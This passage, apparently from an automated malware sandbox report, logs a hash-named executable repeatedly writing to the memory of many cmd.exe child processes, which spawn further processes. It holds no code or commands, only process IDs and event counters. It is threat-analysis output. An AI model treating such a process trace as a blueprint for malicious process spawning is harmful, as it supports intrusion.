d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1018 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1018 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1018 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1018 PID 1820 wrote to memory of 1412 1820 cmd.exe 1020 PID 1820 wrote to memory of 1412 1820 cmd.exe 1020 PID 1820 wrote to memory of 1412 1820 cmd.exe 1020 PID 1820 wrote to memory of 1412 1820 cmd.exe 1020 PID 1820 wrote to memory of 484 1820 cmd.exe 1021 PID 1820 wrote to memory of 484 1820 cmd.exe 1021 PID 1820 wrote to memory of 484 1820 cmd.exe 1021 PID 1820 wrote to memory of 484 1820 cmd.exe 1021 PID 1820 wrote to memory of 1816 1820 cmd.exe 1022 PID 1820 wrote to memory of 1816 1820 cmd.exe 1022 PID 1820 wrote to memory of 1816 1820 cmd.exe 1022 PID 1820 wrote to memory of 1816 1820 cmd.exe 1022 PID 1816 wrote to memory of 280 1816 cmd.exe 1023 PID 1816 wrote to memory of 280 1816 cmd.exe 1023 PID 1816 wrote to memory of 280 1816 cmd.exe 1023 PID 1816 wrote to memory of 280 1816 cmd.exe 1023 PID 1820 wrote to memory of 1904 1820 cmd.exe 1024 PID 1820 wrote to memory of 1904 1820 cmd.exe 1024 PID 1820 wrote to memory of 1904 1820 cmd.exe 1024 PID 1820 wrote to memory of 1904 1820 cmd.exe 1024 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1025 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1025 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1025 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1025 PID 1080 wrote to memory of 1108 1080 cmd.exe 1027 PID 1080 wrote to memory of 1108 1080 cmd.exe 1027 PID 1080 wrote to memory of 1108 1080 cmd.exe 1027 PID 1080 wrote to memory of 1108 1080 cmd.exe 1027 PID 1080 wrote to memory of 296 1080 cmd.exe 1028 PID 1080 wrote to memory of 296 1080 cmd.exe 1028 PID 1080 wrote to memory of 296 1080 cmd.exe 1028 PID 1080 wrote to memory of 296 1080 cmd.exe 1028 PID 1080 wrote to memory of 1260 1080 cmd.exe 1029 PID 1080 wrote to memory of 1260 1080 cmd.exe 1029 PID 1080 wrote to memory of 1260 1080 cmd.exe 1029 PID 1080 wrote to memory of 1260 1080 cmd.exe 1029 PID 1260 wrote to memory of 1912 1260 cmd.exe 1030 PID 1260 wrote to memory of 1912 1260 cmd.exe 1030 PID 1260 wrote to memory of 1912 1260 cmd.exe 1030 PID 1260 wrote to memory of 1912 1260 cmd.exe 1030 PID 1080 wrote to memory of 928 1080 cmd.exe 1031 PID 1080 wrote to memory of 928 1080 cmd.exe 1031 PID 1080 wrote to memory of 928 1080 cmd.exe 1031 PID 1080 wrote to memory of 928 1080 cmd.exe 1031 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1032 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1032 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1032 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1032 PID 1344 wrote to memory of 1860 1344 cmd.exe 1034 PID 1344 wrote to memory of 1860 1344 cmd.exe 1034 PID 1344 wrote to memory of 1860 1344 cmd.exe 1034 PID 1344 wrote to memory of 1860 1344 cmd.exe 1034 PID 1344 wrote to memory of 1800 1344 cmd.exe 1035 PID 1344 wrote to memory of 1800 1344 cmd.exe 1035 PID 1344 wrote to memory of 1800 1344 cmd.exe 1035 PID 1344 wrote to memory of 1800 1344 cmd.exe 1035 PID 1344 wrote to memory of 1892 1344 cmd.exe 1036 PID 1344 wrote to memory of 1892 1344 cmd.exe 1036 PID 1344 wrote to memory of 1892 1344 cmd.exe 1036 PID 1344 wrote to memory of 1892 1344 cmd.exe 1036 PID 1892 wrote to memory of 968 1892 cmd.exe 1037 PID 1892 wrote to memory of 968 1892 cmd.exe 1037 PID 1892 wrote to memory of 968 1892 cmd.exe 1037 PID 1892 wrote to memory of 968 1892 cmd.exe 1037 PID 1344 wrote to memory of 292 1344 cmd.exe 1038 PID 1344 wrote to memory of 292 1344 cmd.exe 1038 PID 1344 wrote to memory of 292 1344 cmd.exe 1038 PID 1344 wrote to memory of 292 1344 cmd.exe 1038 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1039 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1039 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1039 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1039 PID 900 wrote to memory of 864 900 cmd.exe 1041 PID 900 wrote to memory of 864 900 cmd.exe 1041 PID 900 wrote to memory of 864 900 cmd.exe 1041 PID 900 wrote to memory of 864 900 cmd.exe 1041 PID 900 wrote to memory of 1816 900 cmd.exe 1042 PID 900 wrote to memory of 1816 900 cmd.exe 1042 PID 900 wrote to memory of 1816 900 cmd.exe 1042 PID 900 wrote to memory of 1816 900 cmd.exe 1042 PID 900 wrote to memory of 1788 900 cmd.exe 1043 PID 900 wrote to memory of 1788 900 cmd.exe 1043 PID 900 wrote to memory of 1788 900 cmd.exe 1043 PID 900 wrote to memory of 1788 900 cmd.exe 1043 PID 1788 wrote to memory of 1096 1788 cmd.exe 1044 PID 1788 wrote to memory of 1096 1788 cmd.exe 1044 PID 1788 wrote to memory of 1096 1788 cmd.exe 1044 PID 1788 wrote to memory of 1096 1788 cmd.exe 1044 PID 900 wrote to memory of 1168 900 cmd.exe 1045 PID 900 wrote to memory of 1168 900 cmd.exe 1045 PID 900 wrote to memory of 1168 900 cmd.exe 1045 PID 900 wrote to memory of 1168 900 cmd.exe 1045 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1046 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1046 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1046 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1046 PID 1108 wrote to memory of 940 1108 cmd.exe 1048 PID 1108 wrote to memory of 940 1108 cmd.exe 1048 PID 1108 wrote to memory of 940 1108 cmd.exe 1048 PID 1108 wrote to memory of 940 1108 cmd.exe 1048 PID 1108 wrote to memory of 1424 1108 cmd.exe 1049 PID 1108 wrote to memory of 1424 1108 cmd.exe 1049 PID 1108 wrote to memory of 1424 1108 cmd.exe 1049 PID 1108 wrote to memory of 1424 1108 cmd.exe 1049 PID 1108 wrote to memory of 1984 1108 cmd.exe 1050 PID 1108 wrote to memory of 1984 1108 cmd.exe 1050 PID 1108 wrote to memory of 1984 1108 cmd.exe 1050 PID 1108 wrote to memory of 1984 1108 cmd.exe 1050 PID 1984 wrote to memory of 1840 1984 cmd.exe 1051 PID 1984 wrote to memory of 1840 1984 cmd.exe 1051 PID 1984 wrote to memory of 1840 1984 cmd.exe 1051 PID 1984 wrote to memory of 1840 1984 cmd.exe 1051 PID 1108 wrote to memory of 964 1108 cmd.exe 1052 PID 1108 wrote to memory of 964 1108 cmd.exe 1052 PID 1108 wrote to memory of 964 1108 cmd.exe 1052 PID 1108 wrote to memory of 964 1108 cmd.exe 1052 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1053 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1053 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1053 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1053 PID 972 wrote to memory of 2016 972 cmd.exe 1055 PID 972 wrote to memory of 2016 972 cmd.exe 1055 PID 972 wrote to memory of 2016 972 cmd.exe 1055 PID 972 wrote to memory of 2016 972 cmd.exe 1055 PID 972 wrote to memory of 968 972 cmd.exe 1056 PID 972 wrote to memory of 968 972 cmd.exe 1056 PID 972 wrote to memory of 968 972 cmd.exe 1056 PID 972 wrote to memory of 968 972 cmd.exe 1056 PID 972 wrote to memory of 1468 972 cmd.exe 1057 PID 972 wrote to memory of 1468 972 cmd.exe 1057 PID 972 wrote to memory of 1468 972 cmd.exe 1057 PID 972 wrote to memory of 1468 972 cmd.exe 1057 PID 1468 wrote to memory of 1404 1468 cmd.exe 1058 PID 1468 wrote to memory of 1404 1468 cmd.exe 1058 PID 1468 wrote to memory of 1404 1468 cmd.exe 1058 PID 1468 wrote to memory of 1404 1468 cmd.exe 1058 PID 972 wrote to memory of 208 972 cmd.exe 1059 PID 972 wrote to memory of 208 972 cmd.exe 1059 PID 972 wrote to memory of 208 972 cmd.exe 1059 PID 972 wrote to memory of 208 972 cmd.exe 1059 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1060 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1060 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1060 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1060 PID 1936 wrote to memory of 1580 1936 cmd.exe 1062 PID 1936 wrote to memory of 1580 1936 cmd.exe 1062 PID 1936 wrote to memory of 1580 1936 cmd.exe 1062 PID 1936 wrote to memory of 1580 1936 cmd.exe 1062 PID 1936 wrote to memory of 1096 1936 cmd.exe 1063 PID 1936 wrote to memory of 1096 1936 cmd.exe 1063 PID 1936 wrote to memory of 1096 1936 cmd.exe 1063 PID 1936 wrote to memory of 1096 1936 cmd.exe 1063 PID 1936 wrote to memory of 220 1936 cmd.exe 1064 PID 1936 wrote to memory of 220 1936 cmd.exe 1064 PID 1936 wrote to memory of 220 1936 cmd.exe 1064 PID 1936 wrote to memory of 220 1936 cmd.exe 1064 PID 220 wrote to memory of 1168 220 cmd.exe 1065 PID 220 wrote to memory of 1168 220 cmd.exe 1065 PID 220 wrote to memory of 1168 220 cmd.exe 1065 PID 220 wrote to memory of 1168 220 cmd.exe 1065 PID 1936 wrote to memory of 1948 1936 cmd.exe 1066 PID 1936 wrote to memory of 1948 1936 cmd.exe 1066 PID 1936 wrote to memory of 1948 1936 cmd.exe 1066 PID 1936 wrote to memory of 1948 1936 cmd.exe 1066 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1067 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1067 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1067 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1067 PID 1912 wrote to memory of 1888 1912 cmd.exe 1069 PID 1912 wrote to memory of 1888 1912 cmd.exe 1069 PID 1912 wrote to memory of 1888 1912 cmd.exe 1069 PID 1912 wrote to memory of 1888 1912 cmd.exe 1069 PID 1912 wrote to memory of 1840 1912 cmd.exe 1070 PID 1912 wrote to memory of 1840 1912 cmd.exe 1070 PID 1912 wrote to memory of 1840 1912 cmd.exe 1070 PID 1912 wrote to memory of 1840 1912 cmd.exe 1070 PID 1912 wrote to memory of 1128 1912 cmd.exe 1071 PID 1912 wrote to memory of 1128 1912 cmd.exe 1071 PID 1912 wrote to memory of 1128 1912 cmd.exe 1071 PID 1912 wrote to memory of 1128 1912 cmd.exe 1071 PID 1128 wrote to memory of 1376 1128 cmd.exe 1072 PID 1128 wrote to memory of 1376 1128 cmd.exe 1072 PID 1128 wrote to memory of 1376 1128 cmd.exe 1072 PID 1128 wrote to memory of 1376 1128 cmd.exe 1072 PID 1912 wrote to memory of 300 1912 cmd.exe 1073 PID 1912 wrote to memory of 300 1912 cmd.exe 1073 PID 1912 wrote to memory of 300 1912 cmd.exe 1073 PID 1912 wrote to memory of 300 1912 cmd.exe 1073 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1074 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1074 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1074 PID 1116 wrote to memory of 468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1074 PID 468 wrote to memory of 212 468 cmd.exe 1076 PID 468 wrote to memory of 212 468 cmd.exe 1076 PID 468 wrote to memory of 212 468 cmd.exe 1076 PID 468 wrote to memory of 212 468 cmd.exe 1076 PID 468 wrote to memory of 1404 468 cmd.exe 1077 PID 468 wrote to memory of 1404 468 cmd.exe 1077 PID 468 wrote to memory of 1404 468 cmd.exe 1077 PID 468 wrote to memory of 1404 468 cmd.exe 1077 PID 468 wrote to memory of 224 468 cmd.exe 1078 PID 468 wrote to memory of 224 468 cmd.exe 1078 PID 468 wrote to memory of 224 468 cmd.exe 1078 PID 468 wrote to memory of 224 468 cmd.exe 1078 PID 224 wrote to memory of 1344 224 cmd.exe 1079 PID 224 wrote to memory of 1344 224 cmd.exe 1079 PID 224 wrote to memory of 1344 224 cmd.exe 1079 PID 224 wrote to memory of 1344 224 cmd.exe 1079 PID 468 wrote to memory of 1800 468 cmd.exe 1080 PID 468 wrote to memory of 1800 468 cmd.exe 1080 PID 468 wrote to memory of 1800 468 cmd.exe 1080 PID 468 wrote to memory of 1800 468 cmd.exe 1080 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1081 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1081 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1081 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1081 PID 524 wrote to memory of 900 524 cmd.exe 1083 PID 524 wrote to memory of 900 524 cmd.exe 1083 PID 524 wrote to memory of 900 524 cmd.exe 1083 PID 524 wrote to memory of 900 524 cmd.exe 1083 PID 524 wrote to memory of 1804 524 cmd.exe 1084 PID 524 wrote to memory of 1804 524 cmd.exe 1084 PID 524 wrote to memory of 1804 524 cmd.exe 1084 PID 524 wrote to memory of 1804 524 cmd.exe 1084 PID 524 wrote to memory of 236 524 cmd.exe 1085 PID 524 wrote to memory of 236 524 cmd.exe 1085 PID 524 wrote to memory of 236 524 cmd.exe 1085 PID 524 wrote to memory of 236 524 cmd.exe 1085 PID 236 wrote to memory of 484 236 cmd.exe 1086 PID 236 wrote to memory of 484 236 cmd.exe 1086 PID 236 wrote to memory of 484 236 cmd.exe 1086 PID 236 wrote to memory of 484 236 cmd.exe 1086 PID 524 wrote to memory of 1904 524 cmd.exe 1087 PID 524 wrote to memory of 1904 524 cmd.exe 1087 PID 524 wrote to memory of 1904 524 cmd.exe 1087 PID 524 wrote to memory of 1904 524 cmd.exe 1087 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1088 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1088 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1088 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1088 PID 232 wrote to memory of 1324 232 cmd.exe 1090 PID 232 wrote to memory of 1324 232 cmd.exe 1090 PID 232 wrote to memory of 1324 232 cmd.exe 1090 PID 232 wrote to memory of 1324 232 cmd.exe 1090 PID 232 wrote to memory of 1376 232 cmd.exe 1091 PID 232 wrote to memory of 1376 232 cmd.exe 1091 PID 232 wrote to memory of 1376 232 cmd.exe 1091 PID 232 wrote to memory of 1376 232 cmd.exe 1091 PID 232 wrote to memory of 1236 232 cmd.exe 1092 PID 232 wrote to memory of 1236 232 cmd.exe 1092 PID 232 wrote to memory of 1236 232 cmd.exe 1092 PID 232 wrote to memory of 1236 232 cmd.exe 1092 PID 1236 wrote to memory of 944 1236 cmd.exe 1093 PID 1236 wrote to memory of 944 1236 cmd.exe 1093 PID 1236 wrote to memory of 944 1236 cmd.exe 1093 PID 1236 wrote to memory of 944 1236 cmd.exe 1093 PID 232 wrote to memory of 848 232 cmd.exe 1094 PID 232 wrote to memory of 848 232 cmd.exe 1094 PID 232 wrote to memory of 848 232 cmd.exe 1094 PID 232 wrote to memory of 848 232 cmd.exe 1094 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1095 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1095 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1095 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1095 PID 292 wrote to memory of 1512 292 cmd.exe 1097 PID 292 wrote to memory of 1512 292 cmd.exe 1097 PID 292 wrote to memory of 1512 292 cmd.exe 1097 PID 292 wrote to memory of 1512 292 cmd.exe 1097 PID 292 wrote to memory of 1344 292 cmd.exe 1098 PID 292 wrote to memory of 1344 292 cmd.exe 1098 PID 292 wrote to memory of 1344 292 cmd.exe 1098 PID 292 wrote to memory of 1344 292 cmd.exe 1098 PID 292 wrote to memory of 896 292 cmd.exe 1099 PID 292 wrote to memory of 896 292 cmd.exe 1099 PID 292 wrote to memory of 896 292 cmd.exe 1099 PID 292 wrote to memory of 896 292 cmd.exe 1099 PID 896 wrote to memory of 380 896 cmd.exe 1100 PID 896 wrote to memory of 380 896 cmd.exe 1100 PID 896 wrote to memory of 380 896 cmd.exe 1100 PID 896 wrote to memory of 380 896 cmd.exe 1100 PID 292 wrote to memory of 968 292 cmd.exe 1101 PID 292 wrote to memory of 968 292 cmd.exe 1101 PID 292 wrote to memory of 968 292 cmd.exe 1101 PID 292 wrote to memory of 968 292 cmd.exe 1101 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1102 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1102 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1102 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1102 PID 1168 wrote to memory of 1808 1168 cmd.exe 1104 PID 1168 wrote to memory of 1808 1168 cmd.exe 1104 PID 1168 wrote to memory of 1808 1168 cmd.exe 1104 PID 1168 wrote to memory of 1808 1168 cmd.exe 1104 PID 1168 wrote to memory of 484 1168 cmd.exe 1105 PID 1168 wrote to memory of 484 1168 cmd.exe 1105 PID 1168 wrote to memory of 484 1168 cmd.exe 1105 PID 1168 wrote to memory of 484 1168 cmd.exe 1105 PID 1168 wrote to memory of 1260 1168 cmd.exe 1106 PID 1168 wrote to memory of 1260 1168 cmd.exe 1106 PID 1168 wrote to memory of 1260 1168 cmd.exe 1106 PID 1168 wrote to memory of 1260 1168 cmd.exe 1106 PID 1260 wrote to memory of 756 1260 cmd.exe 1107 PID 1260 wrote to memory of 756 1260 cmd.exe 1107 PID 1260 wrote to memory of 756 1260 cmd.exe 1107 PID 1260 wrote to memory of 756 1260 cmd.exe 1107 PID 1168 wrote to memory of 1096 1168 cmd.exe 1108 PID 1168 wrote to memory of 1096 1168 cmd.exe 1108 PID 1168 wrote to memory of 1096 1168 cmd.exe 1108 PID 1168 wrote to memory of 1096 1168 cmd.exe 1108 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1109 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1109 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1109 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1109 PID 964 wrote to memory of 1424 964 cmd.exe 1111 PID 964 wrote to memory of 1424 964 cmd.exe 1111 PID 964 wrote to memory of 1424 964 cmd.exe 1111 PID 964 wrote to memory of 1424 964 cmd.exe 1111 PID 964 wrote to memory of 944 964 cmd.exe 1112 PID 964 wrote to memory of 944 964 cmd.exe 1112 PID 964 wrote to memory of 944 964 cmd.exe 1112 PID 964 wrote to memory of 944 964 cmd.exe 1112 PID 964 wrote to memory of 2016 964 cmd.exe 1113 PID 964 wrote to memory of 2016 964 cmd.exe 1113 PID 964 wrote to memory of 2016 964 cmd.exe 1113 PID 964 wrote to memory of 2016 964 cmd.exe 1113 PID 2016 wrote to memory of 1912 2016 cmd.exe 1114 PID 2016 wrote to memory of 1912 2016 cmd.exe 1114 PID 2016 wrote to memory of 1912 2016 cmd.exe 1114 PID 2016 wrote to memory of 1912 2016 cmd.exe 1114 PID 964 wrote to memory of 1080 964 cmd.exe 1115 PID 964 wrote to memory of 1080 964 cmd.exe 1115 PID 964 wrote to memory of 1080 964 cmd.exe 1115 PID 964 wrote to memory of 1080 964 cmd.exe 1115 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1116 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1116 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1116 PID 1116 wrote to memory of 208 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1116 PID 208 wrote to memory of 1412 208 cmd.exe 1118 PID 208 wrote to memory of 1412 208 cmd.exe 1118 PID 208 wrote to memory of 1412 208 cmd.exe 1118 PID 208 wrote to memory of 1412 208 cmd.exe 1118 PID 208 wrote to memory of 380 208 cmd.exe 1119 PID 208 wrote to memory of 380 208 cmd.exe 1119 PID 208 wrote to memory of 380 208 cmd.exe 1119 PID 208 wrote to memory of 380 208 cmd.exe 1119 PID 208 wrote to memory of 1580 208 cmd.exe 1120 PID 208 wrote to memory of 1580 208 cmd.exe 1120 PID 208 wrote to memory of 1580 208 cmd.exe 1120 PID 208 wrote to memory of 1580 208 cmd.exe 1120 PID 1580 wrote to memory of 1892 1580 cmd.exe 1121 PID 1580 wrote to memory of 1892 1580 cmd.exe 1121 PID 1580 wrote to memory of 1892 1580 cmd.exe 1121 PID 1580 wrote to memory of 1892 1580 cmd.exe 1121 PID 208 wrote to memory of 1404 208 cmd.exe 1122 PID 208 wrote to memory of 1404 208 cmd.exe 1122 PID 208 wrote to memory of 1404 208 cmd.exe 1122 PID 208 wrote to memory of 1404 208 cmd.exe 1122 PID 1116 wrote to memory of 1948 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1123 PID 1116 wrote to memory of 1948 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1123 PID 1116 wrote to memory of 1948 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1123 PID 1116 wrote to memory of 1948 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1123 PID 1948 wrote to memory of 1372 1948 cmd.exe 1125 PID 1948 wrote to memory of 1372 1948 cmd.exe 1125 PID 1948 wrote to memory of 1372 1948 cmd.exe 1125 PID 1948 wrote to memory of 1372 1948 cmd.exe 1125 PID 1948 wrote to memory of 940 1948 cmd.exe 1126 PID 1948 wrote to memory of 940 1948 cmd.exe 1126 PID 1948 wrote to memory of 940 1948 cmd.exe 1126 PID 1948 wrote to memory of 940 1948 cmd.exe 1126 PID 1948 wrote to memory of 1888 1948 cmd.exe 1127 PID 1948 wrote to memory of 1888 1948 cmd.exe 1127 PID 1948 wrote to memory of 1888 1948 cmd.exe 1127 PID 1948 wrote to memory of 1888 1948 cmd.exe 1127 PID 1888 wrote to memory of 1788 1888 cmd.exe 1128 PID 1888 wrote to memory of 1788 1888 cmd.exe 1128 PID 1888 wrote to memory of 1788 1888 cmd.exe 1128 PID 1888 wrote to memory of 1788 1888 cmd.exe 1128 PID 1948 wrote to memory of 1804 1948 cmd.exe 1129 PID 1948 wrote to memory of 1804 1948 cmd.exe 1129 PID 1948 wrote to memory of 1804 1948 cmd.exe 1129 PID 1948 wrote to memory of 1804 1948 cmd.exe 1129 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1130 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1130 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1130 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1130 PID 300 wrote to memory of 1840 300 cmd.exe 1132 PID 300 wrote to memory of 1840 300 cmd.exe 1132 PID 300 wrote to memory of 1840 300 cmd.exe 1132 PID 300 wrote to memory of 1840 300 cmd.exe 1132 PID 300 wrote to memory of 1912 300 cmd.exe 1133 PID 300 wrote to memory of 1912 300 cmd.exe 1133 PID 300 wrote to memory of 1912 300 cmd.exe 1133 PID 300 wrote to memory of 1912 300 cmd.exe 1133 PID 300 wrote to memory of 212 300 cmd.exe 1134 PID 300 wrote to memory of 212 300 cmd.exe 1134 PID 300 wrote to memory of 212 300 cmd.exe 1134 PID 300 wrote to memory of 212 300 cmd.exe 1134 PID 212 wrote to memory of 1080 212 cmd.exe 1135 PID 212 wrote to memory of 1080 212 cmd.exe 1135 PID 212 wrote to memory of 1080 212 cmd.exe 1135 PID 212 wrote to memory of 1080 212 cmd.exe 1135 PID 300 wrote to memory of 1376 300 cmd.exe 1136 PID 300 wrote to memory of 1376 300 cmd.exe 1136 PID 300 wrote to memory of 1376 300 cmd.exe 1136 PID 300 wrote to memory of 1376 300 cmd.exe 1136 PID 1116 wrote to memory of 1800 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1137 PID 1116 wrote to memory of 1800 1116 